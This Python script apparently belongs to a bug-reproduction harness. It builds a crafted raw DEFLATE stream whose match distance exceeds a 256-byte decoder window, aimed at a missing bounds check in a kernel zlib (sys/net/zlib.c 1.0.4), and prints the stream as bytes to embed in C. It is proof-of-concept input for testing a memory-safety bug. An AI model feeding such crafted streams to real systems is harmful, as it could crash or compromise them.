DF-0265 / gen_stream.py
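#!/usr/bin/env python3
# gen_stream.py -- how the crafted raw-DEFLATE stream embedded in harness.c
# was produced.  Run on the host (the DragonFly guest has no python):
#
#     python3 gen_stream.py
#
# Strategy: compress with a 32KiB encoder window (windowBits=-15) so the
# encoder is free to emit distance codes up to 32768.  Engineer the input
# so the ONLY match available for the second copy of a long pseudo-random
# pattern is more than 256 bytes back, forcing the encoder to emit a
# distance > 256.  The resulting raw stream, fed to a decoder opened with
# inflateInit2(-8) (256-byte window), triggers the missing distance-bounds
# check in sys/net/zlib.c 1.0.4.
#
# The script checks its own premises before printing: the back-reference
# distance really exceeds the decoder window, the stream round-trips with
# the encoder's window, and the stream is shorter than the input.

import sys
import zlib

# Decoder window size implied by inflateInit2(-8): 2**8 bytes.
TARGET_WINDOW = 1 << 8

# 258 bytes = DEFLATE's maximum match length.  The generator has period 256,
# so bytes 256 and 257 repeat bytes 0 and 1; a 2-byte repeat is below
# DEFLATE's 3-byte minimum match, so it offers the encoder no short-distance
# back-reference inside the pattern.
pat = bytes((i * 131 + 17) & 0xff for i in range(258))
gap = b'\x00'
data = pat + gap + pat            # 2nd pat: nearest match at distance 259

# Distance from the second copy back to the first.
match_distance = len(pat) + len(gap)
assert match_distance > TARGET_WINDOW, \
    "match distance does not exceed the decoder window"

co = zlib.compressobj(9, zlib.DEFLATED, -15)   # raw, 32K window
stream = co.compress(data) + co.flush()

# sanity: round-trips with a 32K window
d = zlib.decompressobj(-15)
rt = d.decompress(stream) + d.flush()
assert rt == data, "round-trip mismatch with encoder window"

# Indirect check that the second copy was coded as a back-reference and not
# as literals: the first copy is essentially incompressible, so the stream
# can only be shorter than the input if the repeat was encoded as a match.
assert len(stream) < len(data), \
    "stream is not shorter than the input; no back-reference was emitted"

print("orig_len", len(data))
print("stream_len", len(stream))
print("HEX", stream.hex())
print("C ", "{" + ",".join("0x%02x" % b for b in stream) + "}; // len=%d" % len(stream))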